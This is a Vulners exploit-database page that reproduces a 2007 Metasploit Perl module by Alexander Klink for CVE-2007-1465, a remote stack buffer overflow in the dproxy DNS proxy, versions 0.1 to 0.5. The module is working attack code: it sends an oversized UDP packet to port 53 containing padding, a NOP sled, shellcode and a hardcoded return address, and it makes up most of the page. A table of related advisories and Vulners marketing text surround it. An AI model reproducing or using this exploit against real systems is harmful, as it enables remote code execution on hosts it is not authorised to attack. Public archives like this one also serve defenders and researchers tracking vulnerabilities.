Vulners
Lucene search
dproxy 0.5 - Remote Buffer Overflow (Metasploit)
| Reporter | Title | Published | Views | Family All 10 |
|---|---|---|---|---|
 | dproxy <= 0.5 Remote Buffer Overflow Exploit (meta 2.7) | 23 Mar 200700:00 | – | zdt |
 | CVE-2007-1465 | 24 Mar 200720:00 | – | cve |
 | CVE-2007-1465 | 24 Mar 200720:00 | – | cvelist |
 | dproxy 0.5 - Remote Buffer Overflow (Metasploit) | 23 Mar 200700:00 | – | exploitpack |
 | CVE-2007-1465 | 24 Mar 200720:19 | – | nvd |
 | dproxy.pm.txt | 24 Mar 200700:00 | – | packetstorm |
 | Stack overflow | 24 Mar 200720:19 | – | prion |
| Stack overflow | 4 Apr 200716:19 | – | prion |
 | [Full-disclosure] dproxy - arbitrary code execution through stack buffer overflow vulnerability | 23 Mar 200700:00 | – | securityvulns |
| dproxy DNS proxy buffer overflow | 31 Mar 200700:00 | – | securityvulns |
10
# MetaSploit exploit for remote buffer overflow issue in dproxy
# Written in 2007 by Alexander Klink
# (c) 2007 Cynops GmbH
# released under the same license as MSF (Artistic, GPL dual-licensed)
# $Revision: 1.1 $
package Msf::Exploit::dproxy;
use strict;
use base 'Msf::Exploit';
use Msf::Socket::Udp;
use Pex::Text;
my $advanced = { };
my $info = {
'Name' => 'dproxy v0.1 - v0.5 buffer overflow exploit',
'Version' => '$Revision: 1.1 $',
'Authors' => [ 'Alexander Klink, Cynops GmbH', ],
'Arch' => [ 'x86' ],
'OS' => [ 'linux'],
'Priv' => 0,
'UserOpts' => {
'RHOST' => [1, 'ADDR', 'The target address'],
},
'Payload' => {
'Space' => 500,
'BadChars' => "\x00",
},
'Description' => Pex::Text::Freeform(qq{
This exploits a buffer overflow in dproxy version 0.1 to 0.5.
}),
'Refs' => [
[ 'CVE', '2007-1465' ],
],
'DefaultTarget' => 0,
'Targets' => [
['Linux', 0xbfffe480],
],
'Keys' => [ 'dproxy' ],
'DisclosureDate' => 'Mar 20 2007',
};
sub new {
my $class = shift;
my $self = $class->SUPER::new(
{
'Info' => $info,
'Advanced' => $advanced
}, @_
);
return $self;
}
sub Exploit {
my $self = shift;
my $targetHost = $self->GetVar('RHOST');
my $targetPort = 53;
my $targetIndex = $self->GetVar('TARGET');
my $srcPort = $self->GetVar('CPORT');
my $encodedPayload = $self->GetVar('EncodedPayload');
my $shellcode = $encodedPayload->Payload;
my $target = $self->Targets->[$targetIndex];
if (! $self->InitNops(512)) {
$self->PrintLine("Could not initialize the nop module");
return;
}
my $sock = Msf::Socket::Udp->new(
'PeerAddr' => $targetHost,
'PeerPort' => $targetPort,
'LocalPort' => $srcPort,
);
if($sock->IsError) {
$self->PrintLine('Error creating socket: ' . $sock->GetError);
return;
}
$self->PrintLine('Trying ' . $target->[0] . ' (' . $targetHost . ')');
my $evil = 'A' x 1000 . $self->MakeNops(500) . $shellcode
. 'A' x (2073 - 1500 - length($shellcode)) . pack('V', $target->[1]);
$sock->Send($evil);
return;
}
1;
# milw0rm.com [2007-03-23]Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
23 Mar 2007 00:00Current
7High risk
Vulners AI Score7
CVSS 210
EPSS0.2688